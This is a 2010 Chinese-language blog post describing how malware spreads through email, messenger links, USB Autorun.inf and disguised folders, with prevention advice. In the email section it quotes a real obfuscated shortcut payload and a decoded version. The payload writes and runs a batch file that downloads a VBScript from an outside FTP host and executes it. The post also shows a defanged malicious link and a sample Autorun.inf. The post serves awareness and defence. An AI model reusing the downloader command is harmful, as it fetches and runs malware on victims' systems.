2010年4月30日 星期五

[知識]惡意程式之常見傳播方式

惡意程式之常見傳播方式

在這數位化的時代,
電腦越來越方便,
但是在這方便之中,
確隱藏著許多危機,
許多惡意成是被製造出來,
也一個比一個厲害,
其傳播方式也層出不窮,
以下為大家分享最近各惡意程式常見的傳播方式。

以下圖點擊可放大

(一)網路
1.利用電子郵件傳播
利用釣魚的方式,
引誘對方下載其附件並執行它。
在很久之前,木馬傳播者都以.exe .com .scr 等執行檔引誘別人
接著就進化出 xxxx.jpg.exe ~~等等引誘別人
或著是做成壓縮檔,
但是這樣很容易就被防毒抓到了,
現在又進化出,利用xxx.lnk捷徑 呼叫cmd.exe 利用FTP下載惡意程式,
且可以讓捷徑偽裝成圖檔,讓使用者認為是正常檔案,藉此降低使用者的戒心,
呼叫cmd.exe也可以利用set變數來躲過許多防毒軟體,
其代碼如下
%ComSpec% /c set q= t t.v&set a=z.c&set p=p.g&set h=p -s:z&set n=echo &echo %n%o ft%p%03%a%om^>z>j&echo %n%aa33^>^>z>>j&echo %n%bb33^>^>z>>j&echo %n%get%q%bs^>^>z>>j&echo %n%bye^>^>z>>j&echo ft%h%>>j&echo start t.vbs>>j&ren j s.bat&call s.bat&

整理一下代碼(變數已還原):
cmd /c <=呼叫cmd命令提示字元
echo echo o ftp.g03z.com^>z>j
echo echo aa33^>^>z>>j
echo echo bb33^>^>z>>j
echo echo get t t.vbs^>^>z>>j
echo echo bye^>^>z>>j
echo ftp -s:z>>j <=讀取連接檔 下載t.vbs並執行下載 s.exe d.exe
echo start t.vbs>>j
ren j s.bat
call s.bat

預防方法:
不要隨意開啟別人用信箱寄過來的附件或連結,
開啟前要先詢問寄件者。

2.Yahoo即時通/MSN木馬連結
同樣的利用釣魚方式,
引誘使用者點擊或下載其惡意連結,
最近比較流行的是MSN病毒,
該病毒,如果中了,
只要你上了MSN就會自動對你的所有聯絡人發出帶有病毒連結的惡意訊息~~
Ex:
haha, your PIC?hxxp://ufopyrenees. org/images/view.php?=account@hotmail.com
以上是病毒網址請勿連結(已經過特殊處理)

預防方法:
不隨意開起來自MSN或及時通的可疑帶連結訊息。

(二)硬碟/外接式硬碟
1.透過Autorun.inf自動播放傳播...
此為傳統隨身碟病毒傳播的方式。
該病毒會在你的每個磁區寫入一個病毒主檔+一個Autorun.inf
利用系統硬碟自動播放的功能,
讓使用者開啟硬碟時,
不是開啟硬碟而是開啟病毒主檔,
以此方式入侵到你的系統。
Autorun.inf 的內容
大致上是
[AutoRun]
Open=XXX.EXE
Shell\Open\Command=XXX.EXE
Shell\Explore\Command=XXX.EXE

注:XXX.EXE為病毒執行檔 (副檔名可以是.bat .cmd .scr .pif .vbs 等可執行副檔名)
代表雙擊開啟磁碟會開啟XXX.EXE
對磁碟按右鍵開啟會開啟XXX.EXE
對磁碟按右鍵檔案總管會開啟XXX.EXE

檢測方式,
最簡單的方式,
利用WinRAR開啟你的外接式硬碟
檢查有沒有可疑的執行檔和AUTORUN.INF
例圖:


預防方法:
關閉自動播放
建議是下載安裝Microsoft釋出的補丁KB971029
http://support.microsoft.com/kb/971029
關閉光碟機以外其他磁區的自動播放
並再妮的任何外接式硬碟跟目錄建立一個名為autorun.inf的資料夾~~

2.資料夾病毒
掉包你隨身碟跟目錄的資料夾,
建立假的偽裝資料夾執行檔,
引誘使用者點擊,
檢測方式,
用WinRAR開啟你的磁碟或外接式磁碟,
以下是使用 WinRAR 開啟被感染的隨身碟畫面~

被".exe"資料夾病毒感染的隨身碟...


被".scr"資料夾病毒感染的隨身碟...


被".lnk"(捷徑)資料夾病毒感染的隨身碟...


被"進階"檔案取代式資料夾病毒感染的隨身碟...


預防方式:
進到隨身碟裡面
按檢視 > 選擇 詳細資料


如果被別的電腦感染了,
請先暫時不要碰那些偽裝的資料夾,
可以下載FolderFix修復
http://www.wretch.cc/blog/krichard95/15727032

3.檔案感染
感染所有磁區.exe可執行檔
預防方法建議存放於隨身碟中的EXE檔案,
都把他們壓縮起來,
這樣子可以減少隨身碟在外,受到別台電腦的感染。

以上為目前比較常見的惡意程式傳播方式~
如有不足的地方,歡迎大家提供。

也歡迎大家轉貼...
但是請注明出處唷~~

By K.Richard

原文連結:http://www.wretch.cc/blog/krichard95/15812444

相關文章 :

0 意見: